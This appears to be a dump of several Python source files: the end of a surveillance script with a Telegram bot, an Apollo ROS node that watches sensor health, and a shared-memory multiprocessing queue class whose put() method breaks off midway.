movimentDetection = MovimentDetection()
movimentDetection.objectMinArea = 2500
movimentDetection.start()
objectDetection = ObjectDetection()
faceDetection = FaceDetection()
timerProcess = None
telegramBot = TelegramBot(telegramToken)
idleTimerProcess = None

if __name__ == '__main__':
    main()
main.py
#!/usr/bin/env python
###############################################################################
# Copyright 2017 The Apollo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
"""
This module publishes the car control message.
"""

import rospy
import threading
import math

from sensor_msgs.msg import Image
from std_msgs.msg import Bool
from car_msgs.msg import ABS, PX2
from novatel_msgs.msg import BESTPOS, INSPVA, Alignment

# Latest message seen on each monitored topic (updated by the callbacks).
g_image_msg = Image()
g_can_msg = ABS()
g_rtk_msg = BESTPOS()
g_ins_msg = INSPVA()
g_alig_msg = Alignment()
g_est_msg = PX2()
g_act_msg = PX2()


def est_callback(data):
    global g_est_msg
    g_est_msg = data


def act_callback(data):
    global g_act_msg
    g_act_msg = data


def image_callback(data):
    global g_image_msg
    g_image_msg = data


def rtk_callback(data):
    global g_rtk_msg
    g_rtk_msg = data


def ins_callback(data):
    global g_ins_msg
    g_ins_msg = data


def alig_callback(data):
    global g_alig_msg
    g_alig_msg = data


def can_callback(data):
    global g_can_msg
    g_can_msg = data


def check_msg(time):
    """Return True when `time` (a message header stamp) is within 2 seconds
    of now, i.e. the topic is considered fresh."""
    now = rospy.Time.now()
    t = abs((now - time).to_sec())
    rospy.loginfo("diff " + str(t) + " now " + str(now) + " msg " + str(time))
    if t > 2:
        return False
    else:
        return True


def work():
    """1 Hz watchdog loop: publish a Bool health flag for each input topic.

    RTK is healthy only if the alignment message is fresh AND position_type
    is one of the fixed-solution types {48, 50, 56}; INS is healthy only when
    insstatus == 3.
    """
    global g_image_msg
    global g_can_msg
    global g_rtk_msg
    global g_alig_msg
    global g_ins_msg
    global g_est_msg
    global g_act_msg
    r = rospy.Rate(1)
    while not rospy.is_shutdown():
        # `check_msg` already returns a bool, so publish it directly instead
        # of the original's four-line if/else per topic.
        rospy.loginfo("check image")
        image_status_pub.publish(check_msg(g_image_msg.header.stamp))
        rospy.loginfo("check can")
        can_status_pub.publish(check_msg(g_can_msg.header.stamp))
        rospy.loginfo("check est")
        est_status_pub.publish(check_msg(g_est_msg.header.stamp))
        rospy.loginfo("check act")
        act_status_pub.publish(check_msg(g_act_msg.header.stamp))
        rospy.loginfo("check alig")
        if not check_msg(g_alig_msg.header.stamp):
            rtk_status_pub.publish(False)
        else:
            rtk_status_pub.publish(
                g_rtk_msg.position_type in (48, 50, 56))
        ins_status_pub.publish(g_ins_msg.insstatus == 3)
        r.sleep()


rospy.init_node('data_check', anonymous=True)
image_sub = rospy.Subscriber(
    '/car_msgs/image', Image, image_callback, queue_size=1,
    buff_size=1024 * 1024 * 16)
can_sub = rospy.Subscriber(
    '/car_msgs/ABS', ABS, can_callback, queue_size=1,
    buff_size=1024 * 1024 * 16)
rtk_sub = rospy.Subscriber(
    '/novatel_data/bestpos', BESTPOS, rtk_callback, queue_size=1,
    buff_size=1024 * 1024 * 16)
ins_sub = rospy.Subscriber(
    '/novatel_data/inspva', INSPVA, ins_callback, queue_size=1,
    buff_size=1024 * 1024 * 16)
alig_sub = rospy.Subscriber(
    '/novatel_data/align', Alignment, alig_callback, queue_size=1,
    buff_size=1024 * 1024 * 16)
est_sub = rospy.Subscriber(
    '/car_msgs/estimate_px2', PX2, est_callback, queue_size=1,
    buff_size=1024 * 1024 * 16)
act_sub = rospy.Subscriber(
    '/car_msgs/PX2', PX2, act_callback, queue_size=1,
    buff_size=1024 * 1024 * 16)
image_status_pub = rospy.Publisher('/system_info/image', Bool, queue_size=1)
rtk_status_pub = rospy.Publisher('/system_info/rtk', Bool, queue_size=1)
ins_status_pub = rospy.Publisher('/system_info/ins', Bool, queue_size=1)
can_status_pub = rospy.Publisher('/system_info/can', Bool, queue_size=1)
act_status_pub = rospy.Publisher('/system_info/act', Bool, queue_size=1)
est_status_pub = rospy.Publisher('/system_info/est', Bool, queue_size=1)

th = threading.Thread(target=work)
# BUG FIX: Thread.setDaemon() is deprecated; assign the attribute instead.
th.daemon = True
th.start()
rospy.spin()
queue.py
import copy
import multiprocessing as mp
import multiprocessing.queues as mpq
from queue import Full, Empty
import pickle
import math
# import uuid
import os
import struct
import sys
import time
import typing
import dill  # type: ignore
import zlib

if sys.version_info >= (3, 8):
    from multiprocessing.shared_memory import SharedMemory
    __all__ = ['ShmQueue']
else:
    # On older Pythons the shared-memory backend is unavailable; export
    # nothing and leave SharedMemory as a placeholder type variable so the
    # annotations below still parse.
    from typing import TypeVar
    SharedMemory = TypeVar('SharedMemory')
    __all__ = []


class ShmQueue(mpq.Queue):
    """ShmQueue depends on shared memory instead of pipe to efficiently
    exchange data among processes.

    Shared memory is "System V style" memory blocks which can be shared and
    accessed directly by processes. This implementation is based on
    `multiprocessing.shared_memory.SharedMemory` hence requires Python >= 3.8.

    Its interface is almost identical to `multiprocessing.queue
    <https://docs.python.org/3.8/library/multiprocessing.html#multiprocessing.Queue>`_.
    But it allows one to specify the serializer, which by default is pickle.

    This implementation maintains two lists: a free buffer list, and a ready
    message list. The list heads for both lists are stored in a single shared
    memory area. The free buffer list is linked by the next_block_id field in
    each shared buffer's metadata area.

    Messages are built out of chunks. Each chunk occupies a single buffer.
    Each chunk contains a pointer (an integer identifier) to the next chunk's
    buffer using the next_chunk_block_id field in the shared buffer's
    metadata area.

    The list of ready messages links the first chunk of each ready message
    using the next_block_id field in the shared buffer's metadata area.

    Messages are serialized for transfer from the sender to the receiver.
    The serialized size of a message may not exceed the chunk size times the
    maximum queue size. If the deadlock_immanent_check is enabled (which is
    True by default), a ValueError will be raised on an attempt to put a
    message that is too large.

    Args:
        chunk_size (int, optional): Size of each chunk. By default, it is `ShmQueue.DEFAULT_CHUNK_SIZE` (1*1024*1024). \
            If it is 0, it will be set to `ShmQueue.MAX_CHUNK_SIZE` (512*1024*1024).
        maxsize (int, optional): Maximum queue size, e.g. the maximum number of chunks available to a queue. \
            If it is 0 (default), it will be set to `ShmQueue.DEFAULT_MAXSIZE` (2).
        serializer (obj, optional): Serializer to serialize and deserialize data. \
            If it is None (default), pickle will be used. \
            The serializer should implement `loads(bytes data) -> object` \
            and `dumps(object obj) -> bytes`.
        integrity_check (bool, optional): When True, perform certain integrity checks on messages.
            1) After serializing a message, immediately deserialize it to check for validity.
            2) Save the length of a message after serialization.
            3) Compute a checksum of each chunk of the message.
            4) Include the total message size and chunk checksum in the metadata for each chunk.
            5) When pulling a chunk from the queue, verify the chunk checksum.
            6) After reassembling a message out of chunks, verify the total message size.
        deadlock_check (bool, optional): When fetching a writable block, print a message
            if two or more loops are needed to get a free block. (default is False)
        deadlock_immanent_check (bool, optional): Raise a ValueError if a message submitted
            to put(...) is too large to process. (Default is True)
        watermark_check (bool, optional): When true, print a message with the largest
            message size so far in chunks.
        use_semaphores (bool, optional): When true, use semaphores to control access to
            the free list and the message list. The system will sleep when accessing
            these shared resources, instead of entering a polling loop.

    Note:
        - `close` needs to be invoked once to release memory and avoid a memory leak.
        - `qsize`, `empty` and `full` are implemented but may block.
        - Each shared queue consumes one shared memory area for the shared list heads
          and one shared memory area for each shared buffer. The underlying code in
          multiprocessing.shared_memory.SharedMemory consumes one process file
          descriptor for each shared memory area. There is a limit on the number of
          file descriptors that a process may have open.
        - Thus, there is a tradeoff between the chunk_size and maxsize: smaller chunks
          use memory more effectively with some overhead cost, but may run into the
          limit on the number of open file descriptors to process large messages and
          avoid blocking. Larger chunks waste unused space, but are less likely to run
          into the open file descriptor limit or to block waiting for a free buffer.

    Example::

        def run(q):
            e = q.get()
            print(e)

        if __name__ == '__main__':
            q = ShmQueue(chunk_size=1024 * 4, maxsize=10)
            p = Process(target=run, args=(q,))
            p.start()
            q.put(100)
            p.join()
            q.close()
    """

    MAX_CHUNK_SIZE: int = 512 * 1024 * 1024
    """int: The maximum allowable size for a buffer chunk. 512MB should be a large enough value."""

    DEFAULT_CHUNK_SIZE: int = 1 * 1024 * 1024
    """int: The default size for a buffer chunk."""

    DEFAULT_MAXSIZE: int = 2
    """int: The default maximum size for a queue."""

    RESERVED_BLOCK_ID: int = 0xffffffff
    """int: RESERVED_BLOCK_ID is stored in the list head pointer and next chunk
    block id fields to indicate that there is no next block. This value is
    intended to simplify debugging by removing stale next-block values. It is
    not used to test for block chain termination; counters are used for that
    purpose, instead."""

    META_STRUCT: typing.Mapping[str, typing.Tuple[int, int, str]] = {
        'msg_id': (0, 12, '12s'),
        'msg_size': (12, 16, 'I'),
        'chunk_id': (16, 20, 'I'),
        'total_chunks': (20, 24, 'I'),
        'total_msg_size': (24, 28, 'I'),
        'checksum': (28, 32, 'I'),
        'src_pid': (32, 36, 'I'),
        'next_chunk_block_id': (36, 40, 'I'),
        'next_block_id': (40, 44, 'I')
    }
    """The per-buffer metadata structure parameters for struct.pack(...) and struct.unpack(...)."""

    META_BLOCK_SIZE: int = 44
    """int: The length of the buffer metadata structure in bytes."""

    LIST_HEAD_STRUCT: typing.Mapping[str, typing.Tuple[int, int, str]] = {
        'first_block': (0, 4, 'I'),
        'last_block': (4, 8, 'I'),
        'block_count': (8, 12, 'I')
    }
    """The list head structure parameters for struct.pack(...) and
    struct.unpack(...). The list header structure maintains a block count in
    addition to first_block and last_block pointers."""

    LIST_HEAD_SIZE: int = 12
    """int: The length of a list head structure in bytes."""

    FREE_LIST_HEAD: int = 0
    """int: The index of the free buffer list head in the SharedMemory segment
    for sharing message queue list heads between processes."""

    MSG_LIST_HEAD: int = 1
    """int: The index of the queued message list head in the SharedMemory
    segment for sharing message queue list heads between processes."""

    qid_counter: int = 0
    """int: Each message queue has a queue ID (qid) that identifies the queue
    for debugging messages. This mutable class counter is used to create new
    queue ID values for newly-created queues. Implicitly, this assumes that
    message queues will be created by a single initialization process, then
    distributed to worker processes. If shared message queues will be created
    by multiple processes, then the queue ID should be altered to incorporate
    the process ID (pid) of the process that created the shared message queue,
    or an additional field should be created and presented with the shared
    message queue's creator's pid."""

    def __init__(self,
                 chunk_size: int=DEFAULT_CHUNK_SIZE,
                 maxsize: int=DEFAULT_MAXSIZE,
                 serializer=None,
                 integrity_check: bool=False,
                 deadlock_check: bool=False,
                 deadlock_immanent_check: bool=True,
                 watermark_check: bool = False,
                 use_semaphores: bool = True,
                 verbose: bool=False):
        """Create the shared list-head segment and the per-block shared
        buffers, then thread every block onto the free list."""
        ctx = mp.get_context()  # TODO: What is the proper type hint here?
        super().__init__(maxsize, ctx=ctx)

        # Assign a debugging queue ID from the mutable class counter.
        self.qid: int = self.__class__.qid_counter
        self.__class__.qid_counter += 1

        self.verbose: bool = verbose
        if self.verbose:
            print("Starting ShmQueue qid=%d pid=%d chunk_size=%d maxsize=%d." % (self.qid, os.getpid(), chunk_size, maxsize),
                  file=sys.stderr, flush=True)  # ***

        # 0 means "use the largest allowed chunk"; otherwise clamp to the maximum.
        self.chunk_size: int = min(chunk_size, self.__class__.MAX_CHUNK_SIZE) \
            if chunk_size > 0 else self.__class__.MAX_CHUNK_SIZE
        self.maxsize: int = maxsize if maxsize > 0 else self.__class__.DEFAULT_MAXSIZE
        self.serializer = serializer or pickle

        self.integrity_check: bool = integrity_check
        self.deadlock_check: bool = deadlock_check
        self.deadlock_immanent_check: bool = deadlock_immanent_check
        self.watermark_check: bool = watermark_check
        self.chunk_watermark: int = 0

        # Per-process message ID counter; see generate_msg_id()/consume_msg_id().
        self.mid_counter: int = 0

        self.producer_lock = ctx.Lock()
        self.free_list_lock = ctx.Lock()
        self.msg_list_lock = ctx.Lock()

        self.use_semaphores: bool = use_semaphores
        if not use_semaphores:
            # Put the None case first to make mypy happier.
            self.free_list_semaphore: typing.Optional[typing.Any] = None  # TODO: what is the type returned by ctx.Semaphore(0)?
            self.msg_list_semaphore: typing.Optional[typing.Any] = None
        else:
            self.free_list_semaphore = ctx.Semaphore(0)
            self.msg_list_semaphore = ctx.Semaphore(0)

        # One shared segment holds both list heads (free list and message list).
        self.list_heads: SharedMemory = SharedMemory(create=True, size=self.__class__.LIST_HEAD_SIZE * 2)
        self.init_list_head(self.__class__.FREE_LIST_HEAD)
        self.init_list_head(self.__class__.MSG_LIST_HEAD)

        # NOTE(review): [ctx.Lock()] * maxsize replicates a reference to a
        # SINGLE lock object, so all per-block locks are actually the same
        # lock. If independent per-block locking was intended this should be
        # [ctx.Lock() for _ in range(maxsize)] -- confirm before changing.
        self.block_locks: typing.List[typing.Any] = [ctx.Lock()] * maxsize  # TODO: what is the type returned by ctx.Lock()?
        self.data_blocks: typing.List[SharedMemory] = []
        block_id: int
        for block_id in range(maxsize):
            # Each block is one chunk of payload plus its metadata header.
            self.data_blocks.append(SharedMemory(create=True, size=self.__class__.META_BLOCK_SIZE + self.chunk_size))
            self.add_free_block(block_id)

    def __getstate__(self):
        """This routine captures queue information for pickling when forking a
        new process. Unpicklable members (serializer, shared memory segments)
        are wrapped with dill."""
        return (self.qid,
                self.verbose,
                self.chunk_size,
                self.maxsize,
                dill.dumps(self.serializer),
                self.integrity_check,
                self.deadlock_check,
                self.deadlock_immanent_check,
                self.watermark_check,
                self.chunk_watermark,
                self.mid_counter,
                self.producer_lock,
                self.free_list_lock,
                self.msg_list_lock,
                self.use_semaphores,
                self.free_list_semaphore,
                self.msg_list_semaphore,
                dill.dumps(self.list_heads),
                self.block_locks,
                dill.dumps(self.data_blocks))

    def __setstate__(self, state):
        """This routine restores queue information when forking a new process,
        undoing the dill wrapping applied by __getstate__."""
        (self.qid,
         self.verbose,
         self.chunk_size,
         self.maxsize,
         self.serializer,
         self.integrity_check,
         self.deadlock_check,
         self.deadlock_immanent_check,
         self.watermark_check,
         self.chunk_watermark,
         self.mid_counter,
         self.producer_lock,
         self.free_list_lock,
         self.msg_list_lock,
         self.use_semaphores,
         self.free_list_semaphore,
         self.msg_list_semaphore,
         self.list_heads,
         self.block_locks,
         self.data_blocks) = state
        self.list_heads = dill.loads(self.list_heads)
        self.data_blocks = dill.loads(self.data_blocks)
        self.serializer = dill.loads(self.serializer)

    def get_list_head_field(self, lh: int, type_: str)->int:
        """int: Get a field from a list head.

        Args:
            lh (int): The index of the list head in the list head shared memory.
            type_ (str): The name of the list head field.

        Raises:
            ValueError: type_ is not a known list head field name."""
        addr_s: typing.Optional[int]
        addr_e: typing.Optional[int]
        ctype: typing.Optional[str]
        addr_s, addr_e, ctype = self.__class__.LIST_HEAD_STRUCT.get(type_, (None, None, None))
        if addr_s is None or addr_e is None or ctype is None:
            raise ValueError("get_list_head_field: unrecognized %s" % repr(type_))
        return struct.unpack(ctype, self.list_heads.buf[(self.__class__.LIST_HEAD_SIZE * lh) + addr_s : (self.__class__.LIST_HEAD_SIZE * lh) + addr_e])[0]

    def set_list_head_field(self, lh: int, data: int, type_: str):
        """Store a field into a list head.

        Args:
            lh (int): The index of the list head in the list head shared memory.
            data (int): The value to store.
            type_ (str): The name of the list head field.

        Raises:
            ValueError: type_ is not a known list head field name."""
        addr_s: typing.Optional[int]
        addr_e: typing.Optional[int]
        ctype: typing.Optional[str]
        addr_s, addr_e, ctype = self.__class__.LIST_HEAD_STRUCT.get(type_, (None, None, None))
        if addr_s is None or addr_e is None or ctype is None:
            # NOTE(review): this message says "get_list_head_field" but is
            # raised from set_list_head_field -- runtime string kept as-is.
            raise ValueError("get_list_head_field: unrecognized %s" % repr(type_))
        # TODO: find a better way to calm mypy's annoyance at the following:
        self.list_heads.buf[(self.__class__.LIST_HEAD_SIZE * lh) + addr_s : (self.__class__.LIST_HEAD_SIZE * lh) + addr_e] = struct.pack(ctype, data)  #type: ignore

    def get_meta(self, block: SharedMemory, type_: str)->typing.Union[bytes, int]:
        """typing.Union[bytes, int]: Get a field from a block's metadata area in shared memory.

        Args:
            block (SharedMemory): The shared memory for the data block.
            type_ (str): The name of the metadata field to extract.

        Raises:
            ValueError: type_ is not a known metadata field name."""
        addr_s: typing.Optional[int]
        addr_e: typing.Optional[int]
        ctype: typing.Optional[str]
        addr_s, addr_e, ctype = self.__class__.META_STRUCT.get(type_, (None, None, None))
        if addr_s is None or addr_e is None or ctype is None:
            raise ValueError("get_meta: unrecognized %s" % repr(type_))
        return struct.unpack(ctype, block.buf[addr_s : addr_e])[0]

    def set_meta(self, block: SharedMemory, data, type_: str):
        """Store a field into a block's metadata area in shared memory.

        Args:
            block (SharedMemory): The shared memory for the data block.
            data: The value to store (bytes or int, per the field's format).
            type_ (str): The name of the metadata field to store.

        Raises:
            ValueError: type_ is not a known metadata field name."""
        addr_s: typing.Optional[int]
        addr_e: typing.Optional[int]
        ctype: typing.Optional[str]
        addr_s, addr_e, ctype = self.__class__.META_STRUCT.get(type_, (None, None, None))
        if addr_s is None or addr_e is None or ctype is None:
            raise ValueError("set_meta: unrecognized %s" % repr(type_))
        # TODO: find a better way to calm mypy's annoyance at the following:
        block.buf[addr_s : addr_e] = struct.pack(ctype, data)  #type: ignore

    def get_data(self, block: SharedMemory, data_size: int)->bytes:
        """bytes: Get a memoryview of a shared memory data block.

        Args:
            block (SharedMemory): The shared memory block.
            data_size (int): The number of bytes in the returned memoryview slice."""
        return block.buf[self.__class__.META_BLOCK_SIZE:self.__class__.META_BLOCK_SIZE+data_size]

    def set_data(self, block: SharedMemory, data: bytes, data_size: int):
        """Copy data_size bytes of payload into the block after its metadata area.

        Args:
            block (SharedMemory): The shared memory block.
            data (bytes): The payload to store.
            data_size (int): The number of payload bytes to store."""
        # TODO: find a better way to calm mypy's annoyance at the following:
        block.buf[self.__class__.META_BLOCK_SIZE:self.__class__.META_BLOCK_SIZE+data_size] = data  # type: ignore

    def init_list_head(self, lh: int):
        """Initialize a block list, clearing the block count and setting the
        first_block and last_block fields to the reserved value that indicates
        that they are void pointers.

        Args:
            lh (int): The index of the list head in the list head shared memory area."""
        self.set_list_head_field(lh, 0, 'block_count')
        self.set_list_head_field(lh, self.__class__.RESERVED_BLOCK_ID, 'first_block')
        self.set_list_head_field(lh, self.__class__.RESERVED_BLOCK_ID, 'last_block')

    def get_block_count(self, lh: int)->int:
        """int: Get the count of blocks queued in a block list.

        Args:
            lh (int): The index of the list head in the list head shared memory area.
        """
        return self.get_list_head_field(lh, 'block_count')

    def get_first_block(self, lh: int)->typing.Optional[int]:
        """Get the first block on a block list, updating the list head fields.

        Args:
            lh (int): The index of the list head in the list head shared memory area.

        Returns:
            None: No block is available
            int: The block_id of the first available block.
        """
        block_count: int = self.get_block_count(lh)
        if block_count == 0:
            return None
        block_id: int = self.get_list_head_field(lh, 'first_block')
        block_count -= 1
        if block_count == 0:
            # The list is now empty; reset it to the pristine state.
            self.init_list_head(lh)
        else:
            # Advance first_block to the removed block's successor.
            with self.block_locks[block_id]:
                maybe_next_block_id: typing.Union[bytes, int] = self.get_meta(self.data_blocks[block_id], 'next_block_id')
            if isinstance(maybe_next_block_id, int):
                next_block_id: int = maybe_next_block_id
            else:
                raise ValueError("get_first_block internal error: next_block_id is not int.")
            self.set_list_head_field(lh, next_block_id, 'first_block')
            self.set_list_head_field(lh, block_count, 'block_count')
        return block_id

    def add_block(self, lh: int, block_id: int):
        """Add a block to the tail of a block list.

        Args:
            lh (int): The index of the list head in the list head shared memory area.
            block_id (int): The identifier of the block to append.
        """
        block_count: int = self.get_list_head_field(lh, 'block_count')
        if block_count == 0:
            # Empty list: the new block becomes both head and tail.
            self.set_list_head_field(lh, block_id, 'first_block')
            self.set_list_head_field(lh, block_id, 'last_block')
            self.set_list_head_field(lh, 1, 'block_count')
        else:
            # Link the current tail to the new block, then update the tail.
            last_block: int = self.get_list_head_field(lh, 'last_block')
            with self.block_locks[last_block]:
                self.set_meta(self.data_blocks[last_block], block_id, 'next_block_id')
            self.set_list_head_field(lh, block_id, 'last_block')
            self.set_list_head_field(lh, block_count + 1, 'block_count')

    def get_free_block_count(self)->int:
        """int: Get the number of free blocks."""
        with self.free_list_lock:
            return self.get_block_count(self.__class__.FREE_LIST_HEAD)

    def get_first_free_block(self, block: bool, timeout: typing.Optional[float])->typing.Optional[int]:
        """Get the first free block. When using semaphores, optionally block
        with an optional timeout. If you choose to block without a timeout,
        the method will not return until a free block is available.

        Args:
            block (bool): When True, and when using semaphores, wait until a
                free block is available or a timeout occurs.
            timeout (typing.Optional[float]): When block is True and timeout is
                positive, block for at most timeout seconds attempting to
                acquire the free block.

        Returns:
            None: No block is available
            int: The block_id of the first available block.
        """
        if self.free_list_semaphore is not None:
            self.free_list_semaphore.acquire(block=block, timeout=timeout)
        with self.free_list_lock:
            return self.get_first_block(self.__class__.FREE_LIST_HEAD)

    def add_free_block(self, block_id: int):
        """Return a block to the free block list.

        Args:
            block_id (int): The identifier of the block being returned.
        """
        with self.free_list_lock:
            self.add_block(self.__class__.FREE_LIST_HEAD, block_id)
        if self.free_list_semaphore is not None:
            self.free_list_semaphore.release()

    def get_msg_count(self)->int:
        """int: Get the number of messages on the message list."""
        with self.msg_list_lock:
            return self.get_block_count(self.__class__.MSG_LIST_HEAD)

    def get_first_msg(self, block: bool, timeout: typing.Optional[float])->typing.Optional[int]:
        """Take the first available message, if any, from the available message
        list. When using semaphores, optionally block with an optional timeout.
        If you choose to block without a timeout, the method will not return
        until a free block is available.

        Args:
            block (bool): When True, and when using semaphores, wait until a
                message is available or a timeout occurs.
            timeout (typing.Optional[float]): When block is True and timeout is
                positive, block for at most timeout seconds attempting to
                acquire the message.

        Returns:
            None: No message is available
            int: The block_id of the first chunk of the first available message.
        """
        if self.msg_list_semaphore is not None:
            self.msg_list_semaphore.acquire(block=block, timeout=timeout)
        with self.msg_list_lock:
            return self.get_first_block(self.__class__.MSG_LIST_HEAD)

    def add_msg(self, block_id: int):
        """Add a message to the available message list.

        Args:
            block_id (int): The block identifier of the first chunk of the message.
        """
        with self.msg_list_lock:
            self.add_block(self.__class__.MSG_LIST_HEAD, block_id)
        if self.msg_list_semaphore is not None:
            self.msg_list_semaphore.release()

    def generate_msg_id(self)->bytes:
        """bytes: Generate the next message identifier, but do not consume it.

        Note:
            Message IDs are assigned independently by each process using the
            queue. They need to be paired with the source process ID to be
            used to identify a message for debugging.
        """
        return ("%012x" % (self.mid_counter + 1)).encode('utf-8')

    def consume_msg_id(self):
        """Consume a message identifier.

        Note:
            Message identifiers are consumed when we are certain that we can
            process the message. They will not be consumed if we start to
            process a message but fail due to a condition such as insufficient
            free buffers.
        """
        self.mid_counter += 1

    def next_writable_block_id(self, block: bool, timeout: typing.Optional[float], msg_id: bytes, src_pid: int)->int:
        """int: Get the block ID of the first free block.

        Get the block ID of the first free block, supporting
        blocking/nonblocking modes and timeouts when blocking, even when
        semaphores are not being used. Store in the block's metadata area the
        message ID for the message we are building and the pid of the process
        acquiring the block.

        Args:
            block (bool): When True, and when using semaphores, wait until a
                free block is available or a timeout occurs.
            timeout (typing.Optional[float]): When block is True and timeout is
                positive, block for at most timeout seconds attempting to
                acquire the free block.
            msg_id (bytes): The message ID assigned to the message being built.
            src_pid: The process ID (pid) of the process that is acquiring the block.

        Raises:
            queue.Full: No block is available. Full is raised immediately in
                nonblocking mode, or after the timeout in blocking mode when a
                timeout is specified.
        """
        looped: bool = False
        loop_cnt: int = 0
        time_start = time.time()
        while True:
            # Recompute the remaining time budget on each pass.
            remaining_timeout: typing.Optional[float] = timeout
            if remaining_timeout is not None:
                remaining_timeout -= (time.time() - time_start)
                if remaining_timeout <= 0:
                    if self.verbose:
                        print("next_writable_block_id: qid=%d src_pid=%d: queue FULL (timeout)" % (self.qid, src_pid),
                              file=sys.stderr, flush=True)  # ***
                    raise Full
            block_id: typing.Optional[int] = self.get_first_free_block(block, remaining_timeout)
            if block_id is not None:
                break
            if not block:
                if self.verbose:
                    print("next_writable_block_id: qid=%d src_pid=%d: FULL (nonblocking)" % (self.qid, src_pid),
                          file=sys.stderr, flush=True)  # ***
                raise Full
            if self.deadlock_check or self.verbose:
                loop_cnt += 1
                if (self.verbose and loop_cnt == 2) or (self.deadlock_check and loop_cnt % 10000 == 0):
                    looped = True
                    print("next_writable_block_id: qid=%d src_pid=%d: looping (%d loops)" % (self.qid, src_pid, loop_cnt),
                          file=sys.stderr, flush=True)  # ***
        if looped:
            print("next_writable_block_id: qid=%d src_pid=%d: looping ended after %d loops." % (self.qid, src_pid, loop_cnt),
                  file=sys.stderr, flush=True)  # ***
        # Stamp the newly-acquired block with the message ID and owner pid.
        with self.block_locks[block_id]:
            data_block = self.data_blocks[block_id]
            self.set_meta(data_block, msg_id, 'msg_id')
            self.set_meta(data_block, src_pid, 'src_pid')
        return block_id

    def next_readable_msg(self, block: bool, timeout: typing.Optional[float]=None)->typing.Tuple[int, bytes, int, int, int]:
        """Get the next available message, with blocking and timeouts.

        This method returns a 5-tuple: the data block and certain metadata.
        The reason for this complexity is to retrieve the metadata under a
        single access lock.

        Args:
            block (bool): When True, and when using semaphores, wait until a
                free block is available or a timeout occurs.
            timeout (typing.Optional[float]): When block is True and timeout is
                positive, block for at most timeout seconds attempting to
                acquire the free block.

        Returns:
            src_pid (int): The process identifier of the process that originated the message.
            msg_id (bytes): The message identifier.
            block_id (int): The identifier for the first chunk in the message.
            total_chunks (int): The total number of chunks in the message.
            next_chunk_block_id (int): The identifier for the next chunk in the message.

        Raises:
            queue.Empty: no messages are available and either nonblocking mode
                or a timeout occurred.
            ValueError: An internal error occurred in accessing the message's metadata.
        """
        i = 0  # NOTE(review): unused local, kept for token fidelity.
        time_start = time.time()
        while True:
            remaining_timeout: typing.Optional[float] = timeout
            if remaining_timeout is not None:
                remaining_timeout -= (time.time() - time_start)
                if remaining_timeout <= 0:
                    raise Empty
            block_id: typing.Optional[int] = self.get_first_msg(block=block, timeout=remaining_timeout)
            if block_id is not None:
                break
            if not block:
                raise Empty
        # Read all of the first chunk's metadata under one lock acquisition.
        with self.block_locks[block_id]:
            data_block = self.data_blocks[block_id]
            src_pid: typing.Union[bytes, int] = self.get_meta(data_block, 'src_pid')
            msg_id: typing.Union[bytes, int] = self.get_meta(data_block, 'msg_id')
            total_chunks: typing.Union[bytes, int] = self.get_meta(data_block, 'total_chunks')
            next_chunk_block_id: typing.Union[bytes, int] = self.get_meta(data_block, 'next_chunk_block_id')
        if isinstance(src_pid, int) and isinstance(msg_id, bytes) and isinstance(total_chunks, int) and isinstance(next_chunk_block_id, int):
            return src_pid, msg_id, block_id, total_chunks, next_chunk_block_id
        else:
            raise ValueError("next_readable_msg: internal error extracting data block metadata.")

    # def debug_data_block(self):
    #     for b in self.data_blocks:
    #         print(bytes(b.buf[0:24]))

    def put(self, msg: typing.Any, block: bool=True, timeout: typing.Optional[float]=None):
        """
        Put an object into a shared memory queue.

        Args:
            msg (obj): The object which is to be put into queue.
            block (bool, optional): If it is set to True (default), it will return after an item is put into queue.
            timeout (int, optional): A positive integer for the timeout duration in seconds, which is only effective when `block` is set to True.

        Raises:
            queue.Full: Raised if the call times out or the queue is full when `block` is False.
            ValueError: An internal error occurred in accessing the message's metadata.
            ValueError: A request was made to send a message that, when serialized, exceeds the capacity of the queue.
            PicklingError: This exception is raised when the serializer is pickle and an error occurred in serializing the message.
            UnpicklingError: This exception is raised when the serializer is pickle and an error occurred in deserializing the message for an integrity check.

        Note:
            - Errors other than PicklingError might be raised if a serializer other than pickle is specified.
        """
        if timeout is not None:
            if not block:
                # NOTE(review): a timeout is actually allowed only when
                # BLOCKING; this error message states the opposite. Runtime
                # string kept as-is -- confirm before correcting it.
                raise ValueError("A timeout is allowed only when not blocking.")
            if timeout < 0:
                raise Full
        msg_id: bytes = self.generate_msg_id()
        src_pid: int = os.getpid()
        msg_body: bytes = self.serializer.dumps(msg)  # type: ignore[union-attr]
        if self.integrity_check:
            total_msg_size: int = len(msg_body)
            # Round-trip the serialized body; loads() raising is the check.
            msg2: typing.Any = self.serializer.loads(msg_body)  # type: ignore[union-attr]
            if self.verbose:
                print("put: qid=%d src_pid=%d msg_id=%r: serialization integrity check is OK."
                      % (self.qid, src_pid, msg_id), file=sys.stderr, flush=True)  # ***
        total_chunks: int = math.ceil(len(msg_body) / self.chunk_size)
        if self.verbose:
            print("put: qid=%d src_pid=%d msg_id=%r: total_chunks=%d len(msg_body)=%d chunk_size=%d" % (self.qid, src_pid, msg_id, total_chunks, len(msg_body), self.chunk_size),
                  file=sys.stderr, flush=True)  # ***
        if self.watermark_check or self.verbose:
            if total_chunks > self.chunk_watermark:
                print("put: qid=%d src_pid=%d msg_id=%r: total_chunks=%d maxsize=%d new watermark" % (self.qid, src_pid, msg_id, total_chunks, self.maxsize),
                      file=sys.stderr, flush=True)  # ***
                self.chunk_watermark = total_chunks
        if self.deadlock_immanent_check and total_chunks > self.maxsize:
            # The message can never fit: it needs more chunks than exist.
            raise ValueError("DEADLOCK IMMANENT: qid=%d src_pid=%d: total_chunks=%d > maxsize=%d" % (self.qid, src_pid, total_chunks, self.maxsize))

        time_start: float = time.time()

        # We acquire the producer lock to avoid deadlock if multiple
        # producers need multiple chunks each.
        lock_acquired: bool = self.producer_lock.acquire(timeout=timeout)
        if not lock_acquired:
            # We must have timed out.
            if self.verbose:
                print("put: qid=%d src_pid=%d msg_id=%r: queue FULL" % (self.qid, src_pid, msg_id),
                      file=sys.stderr, flush=True)  # ***
            raise Full

        block_id: int
        block_id_list: typing.List[int] = [ ]
        try:
            # In case we will process more than one chunk and this is a
            # nonblocking or timed out request, start by reserving all the
            # blocks that we will need.
            i: int
